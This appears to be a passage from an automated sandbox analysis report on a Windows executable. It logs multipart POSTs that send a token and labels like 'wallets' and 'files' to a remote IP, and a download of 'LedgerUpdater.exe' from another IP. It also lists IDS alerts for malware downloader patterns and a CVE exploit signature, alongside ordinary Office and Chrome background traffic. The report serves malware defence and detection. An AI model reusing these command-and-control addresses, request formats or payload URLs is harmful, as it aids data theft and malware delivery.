Source: global traffic	HTTP traffic detected: POST /c882d91d1df1bdb3.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KECFCGHIDHCAKEBFCFHCHost: 62.204.41.163Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 45 43 46 43 47 48 49 44 48 43 41 4b 45 42 46 43 46 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 63 39 65 33 35 38 33 33 33 33 35 66 38 38 33 62 38 30 31 39 37 35 65 63 30 63 64 39 36 38 65 30 32 61 63 37 37 36 66 37 31 36 35 64 66 35 30 36 63 38 34 64 61 34 32 61 36 61 63 64 31 61 38 65 33 38 37 64 64 62 33 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 43 46 43 47 48 49 44 48 43 41 4b 45 42 46 43 46 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 61 6c 6c 65 74 73 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 43 46 43 47 48 49 44 48 43 41 4b 45 42 46 43 46 48 43 2d 2d 0d 0a Data Ascii: ------KECFCGHIDHCAKEBFCFHCContent-Disposition: form-data; name="token"3c9e35833335f883b801975ec0cd968e02ac776f7165df506c84da42a6acd1a8e387ddb3------KECFCGHIDHCAKEBFCFHCContent-Disposition: form-data; name="message"wallets------KECFCGHIDHCAKEBFCFHC--
Source: global traffic	HTTP traffic detected: POST /c882d91d1df1bdb3.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KJEBKJDAFHJDGDHJKKEGHost: 62.204.41.163Content-Length: 265Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 4a 45 42 4b 4a 44 41 46 48 4a 44 47 44 48 4a 4b 4b 45 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 63 39 65 33 35 38 33 33 33 33 35 66 38 38 33 62 38 30 31 39 37 35 65 63 30 63 64 39 36 38 65 30 32 61 63 37 37 36 66 37 31 36 35 64 66 35 30 36 63 38 34 64 61 34 32 61 36 61 63 64 31 61 38 65 33 38 37 64 64 62 33 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 45 42 4b 4a 44 41 46 48 4a 44 47 44 48 4a 4b 4b 45 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 69 6c 65 73 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 45 42 4b 4a 44 41 46 48 4a 44 47 44 48 4a 4b 4b 45 47 2d 2d 0d 0a Data Ascii: ------KJEBKJDAFHJDGDHJKKEGContent-Disposition: form-data; name="token"3c9e35833335f883b801975ec0cd968e02ac776f7165df506c84da42a6acd1a8e387ddb3------KJEBKJDAFHJDGDHJKKEGContent-Disposition: form-data; name="message"files------KJEBKJDAFHJDGDHJKKEG--
Source: global traffic	HTTP traffic detected: POST /c882d91d1df1bdb3.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EHIJJDGDHDGDAKFIECFIHost: 62.204.41.163Content-Length: 98199Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /c882d91d1df1bdb3.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BAKFBKEHDBGHJJKFIEGDHost: 62.204.41.163Content-Length: 272Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 42 41 4b 46 42 4b 45 48 44 42 47 48 4a 4a 4b 46 49 45 47 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 63 39 65 33 35 38 33 33 33 33 35 66 38 38 33 62 38 30 31 39 37 35 65 63 30 63 64 39 36 38 65 30 32 61 63 37 37 36 66 37 31 36 35 64 66 35 30 36 63 38 34 64 61 34 32 61 36 61 63 64 31 61 38 65 33 38 37 64 64 62 33 0d 0a 2d 2d 2d 2d 2d 2d 42 41 4b 46 42 4b 45 48 44 42 47 48 4a 4a 4b 46 49 45 47 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 79 62 6e 63 62 68 79 6c 65 70 6d 65 0d 0a 2d 2d 2d 2d 2d 2d 42 41 4b 46 42 4b 45 48 44 42 47 48 4a 4a 4b 46 49 45 47 44 2d 2d 0d 0a Data Ascii: ------BAKFBKEHDBGHJJKFIEGDContent-Disposition: form-data; name="token"3c9e35833335f883b801975ec0cd968e02ac776f7165df506c84da42a6acd1a8e387ddb3------BAKFBKEHDBGHJJKFIEGDContent-Disposition: form-data; name="message"ybncbhylepme------BAKFBKEHDBGHJJKFIEGD--
Source: global traffic	HTTP traffic detected: GET /LedgerUpdater.exe HTTP/1.1Host: 176.113.115.215Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /c882d91d1df1bdb3.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GDHIIIIEHCFIECAKFHJDHost: 62.204.41.163Content-Length: 272Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 44 48 49 49 49 49 45 48 43 46 49 45 43 41 4b 46 48 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 63 39 65 33 35 38 33 33 33 33 35 66 38 38 33 62 38 30 31 39 37 35 65 63 30 63 64 39 36 38 65 30 32 61 63 37 37 36 66 37 31 36 35 64 66 35 30 36 63 38 34 64 61 34 32 61 36 61 63 64 31 61 38 65 33 38 37 64 64 62 33 0d 0a 2d 2d 2d 2d 2d 2d 47 44 48 49 49 49 49 45 48 43 46 49 45 43 41 4b 46 48 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 6b 6b 6a 71 61 69 61 78 6b 68 62 0d 0a 2d 2d 2d 2d 2d 2d 47 44 48 49 49 49 49 45 48 43 46 49 45 43 41 4b 46 48 4a 44 2d 2d 0d 0a Data Ascii: ------GDHIIIIEHCFIECAKFHJDContent-Disposition: form-data; name="token"3c9e35833335f883b801975ec0cd968e02ac776f7165df506c84da42a6acd1a8e387ddb3------GDHIIIIEHCFIECAKFHJDContent-Disposition: form-data; name="message"wkkjqaiaxkhb------GDHIIIIEHCFIECAKFHJD--

Source: Joe Sandbox View	IP Address: 20.125.209.212 20.125.209.212
Source: Joe Sandbox View	IP Address: 162.159.61.3 162.159.61.3

Source: Joe Sandbox View

JA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4

Source: Network traffic	Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.7:49700 -> 62.204.41.163:80
Source: Network traffic	Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.7:49933 -> 62.204.41.163:80
Source: Network traffic	Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.7:50055 -> 176.113.115.215:80
Source: Network traffic	Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 4.175.87.197:443 -> 192.168.2.7:49737
Source: Network traffic	Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 4.175.87.197:443 -> 192.168.2.7:50098

Source: unknown	TCP traffic detected without corresponding DNS query: 104.98.116.138
Source: unknown	TCP traffic detected without corresponding DNS query: 104.98.116.138
Source: unknown	TCP traffic detected without corresponding DNS query: 104.98.116.138
Source: unknown	TCP traffic detected without corresponding DNS query: 104.98.116.138
Source: unknown	TCP traffic detected without corresponding DNS query: 20.50.201.200
Source: unknown	TCP traffic detected without corresponding DNS query: 20.50.201.200
Source: unknown	TCP traffic detected without corresponding DNS query: 20.50.201.200
Source: unknown	TCP traffic detected without corresponding DNS query: 20.50.201.200
Source: unknown	TCP traffic detected without corresponding DNS query: 20.50.201.200
Source: unknown	TCP traffic detected without corresponding DNS query: 104.98.116.138
Source: unknown	TCP traffic detected without corresponding DNS query: 104.98.116.138
Source: unknown	TCP traffic detected without corresponding DNS query: 104.98.116.138
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.163
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.163
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.163
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.163
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.163
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.163
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.163
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.163
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.163
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.163
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.163
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.163
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.163
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.163
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.163
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45

Source: C:\Users\user\Desktop\DbMBWMxoNv.exe

Code function: 0_2_00405000 GetProcessHeap,RtlAllocateHeap,InternetOpenA,InternetOpenUrlA,InternetReadFile,memcpy,InternetCloseHandle,InternetCloseHandle,

0_2_00405000

Source: global traffic	HTTP traffic detected: GET /rules/other-Win32-v19.bundle HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule224902v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120600v4s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120609v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120608v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120402v21s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120612v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120610v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120613v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120614v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120615v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120616v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120617v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120618v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120611v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120619v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120620v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120621v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120623v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120622v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120624v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120625v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120626v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120630v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120629v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120628v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120627v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120632v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120635v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120633v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120634v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120631v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CI62yQEIpLbJAQipncoBCNrwygEIlqHLAQiFoM0BCNy9zQEIucrNAQii0c0BCIrTzQEIpNbNAQj01s0BCKfYzQEI+cDUFRj1yc0BGOuNpRc=Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /rules/rule120636v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120638v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120637v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120639v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CI62yQEIpLbJAQipncoBCNrwygEIlqHLAQiFoM0BCNy9zQEIucrNAQii0c0BCIrTzQEIpNbNAQj01s0BCKfYzQEI+cDUFRj1yc0BGOuNpRc=Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /async/newtab_promos HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /rules/rule120640v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120642v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120641v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120644v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120643v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=lwHAOL4AX1bg3z8&MD=LYNxXoCE HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global traffic	HTTP traffic detected: GET /rules/rule120646v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120647v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120649v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120645v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120648v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120650v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120653v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120652v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120651v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120654v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120658v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120659v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120656v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120657v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120655v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: /Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
Source: global traffic	HTTP traffic detected: GET /rules/rule120662v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120661v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120663v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120660v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
